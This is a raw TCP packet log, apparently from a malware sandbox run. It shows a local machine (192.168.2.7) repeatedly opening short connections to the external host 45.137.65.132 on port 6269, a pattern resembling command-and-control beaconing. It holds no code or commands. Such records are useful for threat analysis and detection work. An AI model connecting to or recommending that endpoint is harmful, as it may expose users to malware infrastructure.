                    Feb 1, 2023 05:14:18.768928051 CET62694971145.137.65.132192.168.2.7
                    Feb 1, 2023 05:14:18.768959999 CET62694971145.137.65.132192.168.2.7
                    Feb 1, 2023 05:14:18.768969059 CET497116269192.168.2.745.137.65.132
                    Feb 1, 2023 05:14:18.768990040 CET62694971145.137.65.132192.168.2.7
                    Feb 1, 2023 05:14:18.769025087 CET62694971145.137.65.132192.168.2.7
                    Feb 1, 2023 05:14:18.769057989 CET62694971145.137.65.132192.168.2.7
                    Feb 1, 2023 05:14:18.769074917 CET497116269192.168.2.745.137.65.132
                    Feb 1, 2023 05:14:18.769074917 CET497116269192.168.2.745.137.65.132
                    Feb 1, 2023 05:14:18.769088984 CET62694971145.137.65.132192.168.2.7
                    Feb 1, 2023 05:14:18.769119024 CET62694971145.137.65.132192.168.2.7
                    Feb 1, 2023 05:14:18.769150972 CET62694971145.137.65.132192.168.2.7
                    Feb 1, 2023 05:14:18.769176960 CET497116269192.168.2.745.137.65.132
                    Feb 1, 2023 05:14:18.769181967 CET62694971145.137.65.132192.168.2.7
                    Feb 1, 2023 05:14:18.769221067 CET497116269192.168.2.745.137.65.132
                    Feb 1, 2023 05:14:18.813965082 CET497116269192.168.2.745.137.65.132
                    Feb 1, 2023 05:14:19.296578884 CET497116269192.168.2.745.137.65.132
                    Feb 1, 2023 05:14:19.377638102 CET62694971145.137.65.132192.168.2.7
                    Feb 1, 2023 05:14:19.407341003 CET497116269192.168.2.745.137.65.132
                    Feb 1, 2023 05:14:19.487582922 CET62694971145.137.65.132192.168.2.7
                    Feb 1, 2023 05:14:19.663661003 CET62694971145.137.65.132192.168.2.7
                    Feb 1, 2023 05:14:19.704507113 CET497116269192.168.2.745.137.65.132
                    Feb 1, 2023 05:14:19.755172014 CET62694971145.137.65.132192.168.2.7
                    Feb 1, 2023 05:14:19.786195993 CET497116269192.168.2.745.137.65.132
                    Feb 1, 2023 05:14:19.814979076 CET62694971145.137.65.132192.168.2.7
                    Feb 1, 2023 05:14:19.816914082 CET497116269192.168.2.745.137.65.132
                    Feb 1, 2023 05:14:19.846683979 CET62694971145.137.65.132192.168.2.7
                    Feb 1, 2023 05:14:19.846810102 CET497116269192.168.2.745.137.65.132
                    Feb 1, 2023 05:14:19.876189947 CET62694971145.137.65.132192.168.2.7
                    Feb 1, 2023 05:14:19.876279116 CET497116269192.168.2.745.137.65.132
                    Feb 1, 2023 05:14:19.956121922 CET62694971145.137.65.132192.168.2.7
                    Feb 1, 2023 05:14:19.956505060 CET497116269192.168.2.745.137.65.132
                    Feb 1, 2023 05:14:20.034943104 CET62694971145.137.65.132192.168.2.7
                    Feb 1, 2023 05:14:20.083103895 CET62694971145.137.65.132192.168.2.7
                    Feb 1, 2023 05:14:20.126480103 CET497116269192.168.2.745.137.65.132
                    Feb 1, 2023 05:14:20.515434980 CET497116269192.168.2.745.137.65.132
                    Feb 1, 2023 05:14:25.633866072 CET497146269192.168.2.745.137.65.132
                    Feb 1, 2023 05:14:25.663134098 CET62694971445.137.65.132192.168.2.7
                    Feb 1, 2023 05:14:25.663325071 CET497146269192.168.2.745.137.65.132
                    Feb 1, 2023 05:14:25.724066973 CET497146269192.168.2.745.137.65.132
                    Feb 1, 2023 05:14:25.769640923 CET62694971445.137.65.132192.168.2.7
                    Feb 1, 2023 05:14:25.770181894 CET497146269192.168.2.745.137.65.132
                    Feb 1, 2023 05:14:25.798484087 CET62694971445.137.65.132192.168.2.7
                    Feb 1, 2023 05:14:25.875339985 CET497146269192.168.2.745.137.65.132
                    Feb 1, 2023 05:14:25.955198050 CET62694971445.137.65.132192.168.2.7
                    Feb 1, 2023 05:14:26.086467028 CET62694971445.137.65.132192.168.2.7
                    Feb 1, 2023 05:14:26.205094099 CET497146269192.168.2.745.137.65.132
                    Feb 1, 2023 05:14:26.232966900 CET62694971445.137.65.132192.168.2.7
                    Feb 1, 2023 05:14:26.393028975 CET497146269192.168.2.745.137.65.132
                    Feb 1, 2023 05:14:28.067943096 CET497146269192.168.2.745.137.65.132
                    Feb 1, 2023 05:14:28.143093109 CET62694971445.137.65.132192.168.2.7
                    Feb 1, 2023 05:14:28.238734007 CET497146269192.168.2.745.137.65.132
                    Feb 1, 2023 05:14:28.314682961 CET62694971445.137.65.132192.168.2.7
                    Feb 1, 2023 05:14:28.314876080 CET497146269192.168.2.745.137.65.132
                    Feb 1, 2023 05:14:28.343091965 CET62694971445.137.65.132192.168.2.7
                    Feb 1, 2023 05:14:28.401377916 CET497146269192.168.2.745.137.65.132
                    Feb 1, 2023 05:14:28.429351091 CET62694971445.137.65.132192.168.2.7
                    Feb 1, 2023 05:14:28.595957994 CET497146269192.168.2.745.137.65.132
                    Feb 1, 2023 05:14:28.940330982 CET62694971445.137.65.132192.168.2.7
                    Feb 1, 2023 05:14:29.095949888 CET497146269192.168.2.745.137.65.132
                    Feb 1, 2023 05:14:29.178499937 CET497146269192.168.2.745.137.65.132
                    Feb 1, 2023 05:14:29.252423048 CET62694971445.137.65.132192.168.2.7
                    Feb 1, 2023 05:14:30.192272902 CET497146269192.168.2.745.137.65.132
                    Feb 1, 2023 05:14:34.279604912 CET497206269192.168.2.745.137.65.132
                    Feb 1, 2023 05:14:34.309459925 CET62694972045.137.65.132192.168.2.7
                    Feb 1, 2023 05:14:34.309669018 CET497206269192.168.2.745.137.65.132
                    Feb 1, 2023 05:14:34.314229012 CET497206269192.168.2.745.137.65.132
                    Feb 1, 2023 05:14:34.360685110 CET62694972045.137.65.132192.168.2.7
                    Feb 1, 2023 05:14:34.360948086 CET497206269192.168.2.745.137.65.132
                    Feb 1, 2023 05:14:34.389543056 CET62694972045.137.65.132192.168.2.7
                    Feb 1, 2023 05:14:34.399068117 CET497206269192.168.2.745.137.65.132
                    Feb 1, 2023 05:14:34.486458063 CET62694972045.137.65.132192.168.2.7
                    Feb 1, 2023 05:14:34.601097107 CET62694972045.137.65.132192.168.2.7
                    Feb 1, 2023 05:14:34.601911068 CET497206269192.168.2.745.137.65.132
                    Feb 1, 2023 05:14:34.679805040 CET62694972045.137.65.132192.168.2.7
                    Feb 1, 2023 05:14:34.729351044 CET497206269192.168.2.745.137.65.132
                    Feb 1, 2023 05:14:34.760535002 CET62694972045.137.65.132192.168.2.7
                    Feb 1, 2023 05:14:34.760804892 CET497206269192.168.2.745.137.65.132
                    Feb 1, 2023 05:14:34.789458990 CET62694972045.137.65.132192.168.2.7
                    Feb 1, 2023 05:14:34.789560080 CET497206269192.168.2.745.137.65.132
                    Feb 1, 2023 05:14:34.818411112 CET62694972045.137.65.132192.168.2.7
                    Feb 1, 2023 05:14:35.033988953 CET497206269192.168.2.745.137.65.132
                    Feb 1, 2023 05:14:35.257699966 CET497206269192.168.2.745.137.65.132
                    Feb 1, 2023 05:14:35.330209017 CET62694972045.137.65.132192.168.2.7
                    Feb 1, 2023 05:14:36.223252058 CET497206269192.168.2.745.137.65.132
                    Feb 1, 2023 05:14:40.288341999 CET497226269192.168.2.745.137.65.132
                    Feb 1, 2023 05:14:40.316725016 CET62694972245.137.65.132192.168.2.7
                    Feb 1, 2023 05:14:40.316847086 CET497226269192.168.2.745.137.65.132
                    Feb 1, 2023 05:14:40.317923069 CET497226269192.168.2.745.137.65.132
                    Feb 1, 2023 05:14:40.350682020 CET62694972245.137.65.132192.168.2.7
                    Feb 1, 2023 05:14:40.404304981 CET497226269192.168.2.745.137.65.132
                    Feb 1, 2023 05:14:40.432657957 CET62694972245.137.65.132192.168.2.7
                    Feb 1, 2023 05:14:40.432914972 CET497226269192.168.2.745.137.65.132
                    Feb 1, 2023 05:14:40.461407900 CET62694972245.137.65.132192.168.2.7
                    Feb 1, 2023 05:14:40.474263906 CET497226269192.168.2.745.137.65.132
                    Feb 1, 2023 05:14:40.566881895 CET62694972245.137.65.132192.168.2.7
                    Feb 1, 2023 05:14:40.710064888 CET62694972245.137.65.132192.168.2.7
                    Feb 1, 2023 05:14:40.711699009 CET497226269192.168.2.745.137.65.132
                    Feb 1, 2023 05:14:40.782155037 CET62694972245.137.65.132192.168.2.7
                    Feb 1, 2023 05:14:40.904345989 CET497226269192.168.2.745.137.65.132
                    Feb 1, 2023 05:14:40.935391903 CET62694972245.137.65.132192.168.2.7
                    Feb 1, 2023 05:14:40.936191082 CET497226269192.168.2.745.137.65.132
                    Feb 1, 2023 05:14:40.964495897 CET62694972245.137.65.132192.168.2.7
                    Feb 1, 2023 05:14:40.964693069 CET497226269192.168.2.745.137.65.132
                    Feb 1, 2023 05:14:40.995178938 CET62694972245.137.65.132192.168.2.7
                    Feb 1, 2023 05:14:40.995326042 CET497226269192.168.2.745.137.65.132
                    Feb 1, 2023 05:14:41.080430031 CET62694972245.137.65.132192.168.2.7
                    Feb 1, 2023 05:14:41.295963049 CET497226269192.168.2.745.137.65.132
                    Feb 1, 2023 05:14:46.643490076 CET497236269192.168.2.745.137.65.132
                    Feb 1, 2023 05:14:46.672610998 CET62694972345.137.65.132192.168.2.7
                    Feb 1, 2023 05:14:46.672722101 CET497236269192.168.2.745.137.65.132
                    Feb 1, 2023 05:14:46.673273087 CET497236269192.168.2.745.137.65.132
                    Feb 1, 2023 05:14:46.707896948 CET62694972345.137.65.132192.168.2.7
                    Feb 1, 2023 05:14:46.748568058 CET497236269192.168.2.745.137.65.132
                    Feb 1, 2023 05:14:46.776711941 CET62694972345.137.65.132192.168.2.7
                    Feb 1, 2023 05:14:46.777089119 CET497236269192.168.2.745.137.65.132
                    Feb 1, 2023 05:14:46.805475950 CET62694972345.137.65.132192.168.2.7
                    Feb 1, 2023 05:14:46.821831942 CET497236269192.168.2.745.137.65.132
                    Feb 1, 2023 05:14:46.908535957 CET62694972345.137.65.132192.168.2.7
                    Feb 1, 2023 05:14:47.030082941 CET62694972345.137.65.132192.168.2.7
                    Feb 1, 2023 05:14:47.030843973 CET497236269192.168.2.745.137.65.132
                    Feb 1, 2023 05:14:47.058773994 CET62694972345.137.65.132192.168.2.7
                    Feb 1, 2023 05:14:47.059518099 CET497236269192.168.2.745.137.65.132
                    Feb 1, 2023 05:14:47.087543964 CET62694972345.137.65.132192.168.2.7
                    Feb 1, 2023 05:14:47.087621927 CET497236269192.168.2.745.137.65.132
                    Feb 1, 2023 05:14:47.116431952 CET62694972345.137.65.132192.168.2.7
                    Feb 1, 2023 05:14:47.170562029 CET497236269192.168.2.745.137.65.132
                    Feb 1, 2023 05:14:47.472973108 CET497236269192.168.2.745.137.65.132
                    Feb 1, 2023 05:14:51.631911039 CET497246269192.168.2.745.137.65.132
                    Feb 1, 2023 05:14:51.660244942 CET62694972445.137.65.132192.168.2.7
                    Feb 1, 2023 05:14:51.660383940 CET497246269192.168.2.745.137.65.132
                    Feb 1, 2023 05:14:51.661138058 CET497246269192.168.2.745.137.65.132
                    Feb 1, 2023 05:14:51.698319912 CET62694972445.137.65.132192.168.2.7
                    Feb 1, 2023 05:14:51.749013901 CET497246269192.168.2.745.137.65.132
                    Feb 1, 2023 05:14:51.777071953 CET62694972445.137.65.132192.168.2.7
                    Feb 1, 2023 05:14:51.777487993 CET497246269192.168.2.745.137.65.132
                    Feb 1, 2023 05:14:51.806082010 CET62694972445.137.65.132192.168.2.7
                    Feb 1, 2023 05:14:51.813759089 CET497246269192.168.2.745.137.65.132
                    Feb 1, 2023 05:14:51.892873049 CET62694972445.137.65.132192.168.2.7
                    Feb 1, 2023 05:14:52.035160065 CET62694972445.137.65.132192.168.2.7
                    Feb 1, 2023 05:14:52.037266970 CET497246269192.168.2.745.137.65.132
                    Feb 1, 2023 05:14:52.110991001 CET62694972445.137.65.132192.168.2.7
                    Feb 1, 2023 05:14:52.155234098 CET497246269192.168.2.745.137.65.132
                    Feb 1, 2023 05:14:52.183314085 CET62694972445.137.65.132192.168.2.7
                    Feb 1, 2023 05:14:52.183573008 CET497246269192.168.2.745.137.65.132
                    Feb 1, 2023 05:14:52.216538906 CET62694972445.137.65.132192.168.2.7
                    Feb 1, 2023 05:14:52.216639996 CET497246269192.168.2.745.137.65.132
                    Feb 1, 2023 05:14:52.244822979 CET62694972445.137.65.132192.168.2.7
                    Feb 1, 2023 05:14:52.296015978 CET497246269192.168.2.745.137.65.132
                    Feb 1, 2023 05:14:52.437493086 CET497246269192.168.2.745.137.65.132
                    Feb 1, 2023 05:14:56.499449015 CET497276269192.168.2.745.137.65.132
                    Feb 1, 2023 05:14:56.532592058 CET62694972745.137.65.132192.168.2.7
                    Feb 1, 2023 05:14:56.532696009 CET497276269192.168.2.745.137.65.132
                    Feb 1, 2023 05:14:56.533078909 CET497276269192.168.2.745.137.65.132
                    Feb 1, 2023 05:14:56.574584961 CET62694972745.137.65.132192.168.2.7
                    Feb 1, 2023 05:14:56.624386072 CET497276269192.168.2.745.137.65.132
                    Feb 1, 2023 05:14:56.653598070 CET62694972745.137.65.132192.168.2.7
                    Feb 1, 2023 05:14:56.653862953 CET497276269192.168.2.745.137.65.132
                    Feb 1, 2023 05:14:56.682648897 CET62694972745.137.65.132192.168.2.7
                    Feb 1, 2023 05:14:56.690371037 CET497276269192.168.2.745.137.65.132
                    Feb 1, 2023 05:14:56.767848969 CET62694972745.137.65.132192.168.2.7
                    Feb 1, 2023 05:14:56.906100035 CET62694972745.137.65.132192.168.2.7
                    Feb 1, 2023 05:14:56.928932905 CET497276269192.168.2.745.137.65.132
                    Feb 1, 2023 05:14:56.985970020 CET62694972745.137.65.132192.168.2.7
                    Feb 1, 2023 05:14:57.030735970 CET497276269192.168.2.745.137.65.132
                    Feb 1, 2023 05:14:57.058762074 CET62694972745.137.65.132192.168.2.7
                    Feb 1, 2023 05:14:57.060753107 CET497276269192.168.2.745.137.65.132
                    Feb 1, 2023 05:14:57.089560032 CET62694972745.137.65.132192.168.2.7
                    Feb 1, 2023 05:14:57.089818001 CET497276269192.168.2.745.137.65.132
                    Feb 1, 2023 05:14:57.118231058 CET62694972745.137.65.132192.168.2.7
                    Feb 1, 2023 05:14:57.118638992 CET497276269192.168.2.745.137.65.132
                    Feb 1, 2023 05:14:57.205461025 CET62694972745.137.65.132192.168.2.7
                    Feb 1, 2023 05:14:57.421900988 CET497276269192.168.2.745.137.65.132
                    Feb 1, 2023 05:15:01.487035990 CET497286269192.168.2.745.137.65.132
                    Feb 1, 2023 05:15:01.516397953 CET62694972845.137.65.132192.168.2.7
                    Feb 1, 2023 05:15:01.517808914 CET497286269192.168.2.745.137.65.132
                    Feb 1, 2023 05:15:01.577408075 CET497286269192.168.2.745.137.65.132
                    Feb 1, 2023 05:15:01.624345064 CET62694972845.137.65.132192.168.2.7
                    Feb 1, 2023 05:15:01.671751022 CET497286269192.168.2.745.137.65.132
                    Feb 1, 2023 05:15:01.779140949 CET497286269192.168.2.745.137.65.132
                    Feb 1, 2023 05:15:01.807661057 CET62694972845.137.65.132192.168.2.7
                    Feb 1, 2023 05:15:01.859244108 CET497286269192.168.2.745.137.65.132
                    Feb 1, 2023 05:15:01.859565973 CET497286269192.168.2.745.137.65.132
                    Feb 1, 2023 05:15:01.939641953 CET62694972845.137.65.132192.168.2.7
                    Feb 1, 2023 05:15:02.071634054 CET62694972845.137.65.132192.168.2.7
                    Feb 1, 2023 05:15:02.072304010 CET497286269192.168.2.745.137.65.132
                    Feb 1, 2023 05:15:02.139307022 CET62694972845.137.65.132192.168.2.7
                    Feb 1, 2023 05:15:02.202992916 CET497286269192.168.2.745.137.65.132
                    Feb 1, 2023 05:15:02.231329918 CET62694972845.137.65.132192.168.2.7
                    Feb 1, 2023 05:15:02.258951902 CET497286269192.168.2.745.137.65.132
                    Feb 1, 2023 05:15:02.287974119 CET62694972845.137.65.132192.168.2.7
                    Feb 1, 2023 05:15:02.288127899 CET497286269192.168.2.745.137.65.132
                    Feb 1, 2023 05:15:02.316469908 CET62694972845.137.65.132192.168.2.7
                    Feb 1, 2023 05:15:02.316715956 CET497286269192.168.2.745.137.65.132
                    Feb 1, 2023 05:15:02.394603968 CET62694972845.137.65.132192.168.2.7
                    Feb 1, 2023 05:15:02.534629107 CET497286269192.168.2.745.137.65.132
                    Feb 1, 2023 05:15:02.611608028 CET62694972845.137.65.132192.168.2.7
                    Feb 1, 2023 05:15:03.576740980 CET497286269192.168.2.745.137.65.132
                    Feb 1, 2023 05:15:03.658365965 CET62694972845.137.65.132192.168.2.7
                    Feb 1, 2023 05:15:04.547549009 CET497286269192.168.2.745.137.65.132
                    Feb 1, 2023 05:15:08.599550009 CET497306269192.168.2.745.137.65.132
                    Feb 1, 2023 05:15:08.628833055 CET62694973045.137.65.132192.168.2.7
                    Feb 1, 2023 05:15:08.631426096 CET497306269192.168.2.745.137.65.132
                    Feb 1, 2023 05:15:08.635226965 CET497306269192.168.2.745.137.65.132
                    Feb 1, 2023 05:15:08.680505991 CET62694973045.137.65.132192.168.2.7
                    Feb 1, 2023 05:15:08.680830002 CET497306269192.168.2.745.137.65.132
                    Feb 1, 2023 05:15:08.709526062 CET62694973045.137.65.132192.168.2.7
                    Feb 1, 2023 05:15:08.738801003 CET497306269192.168.2.745.137.65.132
                    Feb 1, 2023 05:15:08.830682039 CET62694973045.137.65.132192.168.2.7
                    Feb 1, 2023 05:15:08.961697102 CET62694973045.137.65.132192.168.2.7
                    Feb 1, 2023 05:15:08.973078012 CET497306269192.168.2.745.137.65.132
                    Feb 1, 2023 05:15:09.035985947 CET62694973045.137.65.132192.168.2.7
                    Feb 1, 2023 05:15:09.094193935 CET497306269192.168.2.745.137.65.132
                    Feb 1, 2023 05:15:09.123846054 CET62694973045.137.65.132192.168.2.7
                    Feb 1, 2023 05:15:09.124111891 CET497306269192.168.2.745.137.65.132
                    Feb 1, 2023 05:15:09.155158997 CET62694973045.137.65.132192.168.2.7
                    Feb 1, 2023 05:15:09.158863068 CET497306269192.168.2.745.137.65.132
                    Feb 1, 2023 05:15:09.189229012 CET62694973045.137.65.132192.168.2.7
                    Feb 1, 2023 05:15:09.208931923 CET497306269192.168.2.745.137.65.132
                    Feb 1, 2023 05:15:09.283662081 CET62694973045.137.65.132192.168.2.7
                    Feb 1, 2023 05:15:09.565958023 CET62694973045.137.65.132192.168.2.7
                    Feb 1, 2023 05:15:09.580115080 CET497306269192.168.2.745.137.65.132
                    Feb 1, 2023 05:15:09.658632040 CET62694973045.137.65.132192.168.2.7
                    Feb 1, 2023 05:15:10.581098080 CET497306269192.168.2.745.137.65.132
                    Feb 1, 2023 05:15:14.724376917 CET497316269192.168.2.745.137.65.132
                    Feb 1, 2023 05:15:14.753302097 CET62694973145.137.65.132192.168.2.7
                    Feb 1, 2023 05:15:14.753477097 CET497316269192.168.2.745.137.65.132
                    Feb 1, 2023 05:15:14.754411936 CET497316269192.168.2.745.137.65.132
                    Feb 1, 2023 05:15:14.788887978 CET62694973145.137.65.132192.168.2.7
                    Feb 1, 2023 05:15:14.844697952 CET497316269192.168.2.745.137.65.132
                    Feb 1, 2023 05:15:14.873083115 CET62694973145.137.65.132192.168.2.7
                    Feb 1, 2023 05:15:14.875116110 CET497316269192.168.2.745.137.65.132
                    Feb 1, 2023 05:15:14.903594971 CET62694973145.137.65.132192.168.2.7
                    Feb 1, 2023 05:15:14.913301945 CET497316269192.168.2.745.137.65.132
                    Feb 1, 2023 05:15:15.002064943 CET62694973145.137.65.132192.168.2.7
                    Feb 1, 2023 05:15:15.135411978 CET62694973145.137.65.132192.168.2.7
                    Feb 1, 2023 05:15:15.136617899 CET497316269192.168.2.745.137.65.132
                    Feb 1, 2023 05:15:15.218395948 CET62694973145.137.65.132192.168.2.7
                    Feb 1, 2023 05:15:15.266562939 CET497316269192.168.2.745.137.65.132
                    Feb 1, 2023 05:15:15.294469118 CET62694973145.137.65.132192.168.2.7
                    Feb 1, 2023 05:15:15.295456886 CET497316269192.168.2.745.137.65.132
                    Feb 1, 2023 05:15:15.323906898 CET62694973145.137.65.132192.168.2.7
                    Feb 1, 2023 05:15:15.324067116 CET497316269192.168.2.745.137.65.132
                    Feb 1, 2023 05:15:15.354475021 CET62694973145.137.65.132192.168.2.7
                    Feb 1, 2023 05:15:15.407300949 CET497316269192.168.2.745.137.65.132
                    Feb 1, 2023 05:15:15.596904039 CET497316269192.168.2.745.137.65.132
                    Feb 1, 2023 05:15:20.006660938 CET497336269192.168.2.745.137.65.132
                    Feb 1, 2023 05:15:20.036281109 CET62694973345.137.65.132192.168.2.7
                    Feb 1, 2023 05:15:20.036451101 CET497336269192.168.2.745.137.65.132
                    Feb 1, 2023 05:15:20.061611891 CET497336269192.168.2.745.137.65.132
                    Feb 1, 2023 05:15:20.106115103 CET62694973345.137.65.132192.168.2.7
                    Feb 1, 2023 05:15:20.106343985 CET497336269192.168.2.745.137.65.132
                    Feb 1, 2023 05:15:20.137056112 CET62694973345.137.65.132192.168.2.7
                    Feb 1, 2023 05:15:20.180881977 CET497336269192.168.2.745.137.65.132
                    Feb 1, 2023 05:15:20.181355953 CET497336269192.168.2.745.137.65.132
                    Feb 1, 2023 05:15:20.268059015 CET62694973345.137.65.132192.168.2.7
                    Feb 1, 2023 05:15:20.391017914 CET62694973345.137.65.132192.168.2.7
                    Feb 1, 2023 05:15:20.392494917 CET497336269192.168.2.745.137.65.132
                    Feb 1, 2023 05:15:20.468040943 CET62694973345.137.65.132192.168.2.7
                    Feb 1, 2023 05:15:20.517294884 CET497336269192.168.2.745.137.65.132
                    Feb 1, 2023 05:15:20.586072922 CET62694973345.137.65.132192.168.2.7
                    Feb 1, 2023 05:15:20.612481117 CET497336269192.168.2.745.137.65.132
                    Feb 1, 2023 05:15:20.640748978 CET62694973345.137.65.132192.168.2.7
                    Feb 1, 2023 05:15:20.688956976 CET497336269192.168.2.745.137.65.132
                    Feb 1, 2023 05:15:21.084595919 CET497336269192.168.2.745.137.65.132
                    Feb 1, 2023 05:15:21.114769936 CET62694973345.137.65.132192.168.2.7
                    Feb 1, 2023 05:15:21.115015030 CET497336269192.168.2.745.137.65.132
                    Feb 1, 2023 05:15:21.146075010 CET62694973345.137.65.132192.168.2.7
                    Feb 1, 2023 05:15:21.146202087 CET497336269192.168.2.745.137.65.132
                    Feb 1, 2023 05:15:21.221666098 CET62694973345.137.65.132192.168.2.7
                    Feb 1, 2023 05:15:21.650913000 CET497336269192.168.2.745.137.65.132
                    Feb 1, 2023 05:15:21.736952066 CET62694973345.137.65.132192.168.2.7
                    Feb 1, 2023 05:15:22.661129951 CET497336269192.168.2.745.137.65.132
                    Feb 1, 2023 05:15:22.754407883 CET62694973345.137.65.132192.168.2.7
                    Feb 1, 2023 05:15:23.642929077 CET497336269192.168.2.745.137.65.132
                    Feb 1, 2023 05:15:27.797094107 CET497346269192.168.2.745.137.65.132
                    Feb 1, 2023 05:15:27.826411963 CET62694973445.137.65.132192.168.2.7
                    Feb 1, 2023 05:15:27.828218937 CET497346269192.168.2.745.137.65.132
                    Feb 1, 2023 05:15:27.830710888 CET497346269192.168.2.745.137.65.132
                    Feb 1, 2023 05:15:27.880654097 CET62694973445.137.65.132192.168.2.7
                    Feb 1, 2023 05:15:27.880997896 CET497346269192.168.2.745.137.65.132
                    Feb 1, 2023 05:15:27.910533905 CET62694973445.137.65.132192.168.2.7
                    Feb 1, 2023 05:15:27.939718008 CET497346269192.168.2.745.137.65.132
                    Feb 1, 2023 05:15:28.018037081 CET62694973445.137.65.132192.168.2.7
                    Feb 1, 2023 05:15:28.149164915 CET62694973445.137.65.132192.168.2.7
                    Feb 1, 2023 05:15:28.154247046 CET497346269192.168.2.745.137.65.132
                    Feb 1, 2023 05:15:28.226543903 CET62694973445.137.65.132192.168.2.7
                    Feb 1, 2023 05:15:28.267771959 CET497346269192.168.2.745.137.65.132
                    Feb 1, 2023 05:15:28.296315908 CET62694973445.137.65.132192.168.2.7
                    Feb 1, 2023 05:15:28.296603918 CET497346269192.168.2.745.137.65.132
                    Feb 1, 2023 05:15:28.331228018 CET62694973445.137.65.132192.168.2.7
                    Feb 1, 2023 05:15:28.331372976 CET497346269192.168.2.745.137.65.132
                    Feb 1, 2023 05:15:28.360246897 CET62694973445.137.65.132192.168.2.7
                    Feb 1, 2023 05:15:28.408412933 CET497346269192.168.2.745.137.65.132
                    Feb 1, 2023 05:15:28.676400900 CET497346269192.168.2.745.137.65.132
                    Feb 1, 2023 05:15:28.754245996 CET62694973445.137.65.132192.168.2.7
                    Feb 1, 2023 05:15:29.681104898 CET497346269192.168.2.745.137.65.132
                    Feb 1, 2023 05:15:33.733480930 CET497356269192.168.2.745.137.65.132
                    Feb 1, 2023 05:15:33.764127016 CET62694973545.137.65.132192.168.2.7
                    Feb 1, 2023 05:15:33.764635086 CET497356269192.168.2.745.137.65.132
                    Feb 1, 2023 05:15:33.765208006 CET497356269192.168.2.745.137.65.132
                    Feb 1, 2023 05:15:33.801145077 CET62694973545.137.65.132192.168.2.7
                    Feb 1, 2023 05:15:33.846318007 CET497356269192.168.2.745.137.65.132
                    Feb 1, 2023 05:15:33.874718904 CET62694973545.137.65.132192.168.2.7
                    Feb 1, 2023 05:15:33.875097036 CET497356269192.168.2.745.137.65.132
                    Feb 1, 2023 05:15:33.904047966 CET62694973545.137.65.132192.168.2.7
                    Feb 1, 2023 05:15:33.912448883 CET497356269192.168.2.745.137.65.132
                    Feb 1, 2023 05:15:34.002249956 CET62694973545.137.65.132192.168.2.7
                    Feb 1, 2023 05:15:34.131453991 CET62694973545.137.65.132192.168.2.7
                    Feb 1, 2023 05:15:34.132286072 CET497356269192.168.2.745.137.65.132
                    Feb 1, 2023 05:15:34.219455004 CET62694973545.137.65.132192.168.2.7
                    Feb 1, 2023 05:15:34.268285990 CET497356269192.168.2.745.137.65.132
                    Feb 1, 2023 05:15:34.296494961 CET62694973545.137.65.132192.168.2.7
                    Feb 1, 2023 05:15:34.296905041 CET497356269192.168.2.745.137.65.132
                    Feb 1, 2023 05:15:34.325452089 CET62694973545.137.65.132192.168.2.7
                    Feb 1, 2023 05:15:34.325643063 CET497356269192.168.2.745.137.65.132
                    Feb 1, 2023 05:15:34.354191065 CET62694973545.137.65.132192.168.2.7
                    Feb 1, 2023 05:15:34.354305029 CET497356269192.168.2.745.137.65.132
                    Feb 1, 2023 05:15:34.439768076 CET62694973545.137.65.132192.168.2.7
                    Feb 1, 2023 05:15:34.675292015 CET497356269192.168.2.745.137.65.132
                    Feb 1, 2023 05:15:39.000288010 CET497376269192.168.2.745.137.65.132
                    Feb 1, 2023 05:15:39.029710054 CET62694973745.137.65.132192.168.2.7
                    Feb 1, 2023 05:15:39.030795097 CET497376269192.168.2.745.137.65.132
                    Feb 1, 2023 05:15:39.069962978 CET497376269192.168.2.745.137.65.132
                    Feb 1, 2023 05:15:39.116595984 CET62694973745.137.65.132192.168.2.7
                    Feb 1, 2023 05:15:39.116816998 CET497376269192.168.2.745.137.65.132
                    Feb 1, 2023 05:15:39.144948006 CET62694973745.137.65.132192.168.2.7
                    Feb 1, 2023 05:15:39.190505028 CET497376269192.168.2.745.137.65.132
                    Feb 1, 2023 05:15:39.199284077 CET497376269192.168.2.745.137.65.132
                    Feb 1, 2023 05:15:39.283343077 CET62694973745.137.65.132192.168.2.7
                    Feb 1, 2023 05:15:39.434462070 CET62694973745.137.65.132192.168.2.7
                    Feb 1, 2023 05:15:39.435499907 CET497376269192.168.2.745.137.65.132
                    Feb 1, 2023 05:15:39.517638922 CET62694973745.137.65.132192.168.2.7
                    Feb 1, 2023 05:15:39.530415058 CET62694973745.137.65.132192.168.2.7
                    Feb 1, 2023 05:15:39.581247091 CET497376269192.168.2.745.137.65.132
                    Feb 1, 2023 05:15:39.609162092 CET62694973745.137.65.132192.168.2.7
                    Feb 1, 2023 05:15:39.610316038 CET497376269192.168.2.745.137.65.132
                    Feb 1, 2023 05:15:39.638925076 CET62694973745.137.65.132192.168.2.7
                    Feb 1, 2023 05:15:39.639415026 CET497376269192.168.2.745.137.65.132
                    Feb 1, 2023 05:15:39.667526960 CET62694973745.137.65.132192.168.2.7
                    Feb 1, 2023 05:15:39.673886061 CET497376269192.168.2.745.137.65.132
                    Feb 1, 2023 05:15:39.768013954 CET62694973745.137.65.132192.168.2.7
                    Feb 1, 2023 05:15:40.341548920 CET497376269192.168.2.745.137.65.132
                    Feb 1, 2023 05:15:40.423851013 CET62694973745.137.65.132192.168.2.7
                    Feb 1, 2023 05:15:41.799633026 CET497376269192.168.2.745.137.65.132
                    Feb 1, 2023 05:15:41.877038002 CET62694973745.137.65.132192.168.2.7
                    Feb 1, 2023 05:15:42.098225117 CET62694973745.137.65.132192.168.2.7
                    Feb 1, 2023 05:15:42.284552097 CET497376269192.168.2.745.137.65.132
                    Feb 1, 2023 05:15:42.813231945 CET497376269192.168.2.745.137.65.132
                    Feb 1, 2023 05:15:46.870948076 CET497386269192.168.2.745.137.65.132
                    Feb 1, 2023 05:15:46.900160074 CET62694973845.137.65.132192.168.2.7
                    Feb 1, 2023 05:15:46.900279045 CET497386269192.168.2.745.137.65.132
                    Feb 1, 2023 05:15:46.900755882 CET497386269192.168.2.745.137.65.132
                    Feb 1, 2023 05:15:46.943032980 CET62694973845.137.65.132192.168.2.7
                    Feb 1, 2023 05:15:46.988126993 CET497386269192.168.2.745.137.65.132
                    Feb 1, 2023 05:15:47.016644955 CET62694973845.137.65.132192.168.2.7
                    Feb 1, 2023 05:15:47.017024040 CET497386269192.168.2.745.137.65.132
                    Feb 1, 2023 05:15:47.045840025 CET62694973845.137.65.132192.168.2.7
                    Feb 1, 2023 05:15:47.055144072 CET497386269192.168.2.745.137.65.132
                    Feb 1, 2023 05:15:47.142967939 CET62694973845.137.65.132192.168.2.7
                    Feb 1, 2023 05:15:47.268764973 CET62694973845.137.65.132192.168.2.7
                    Feb 1, 2023 05:15:47.269825935 CET497386269192.168.2.745.137.65.132
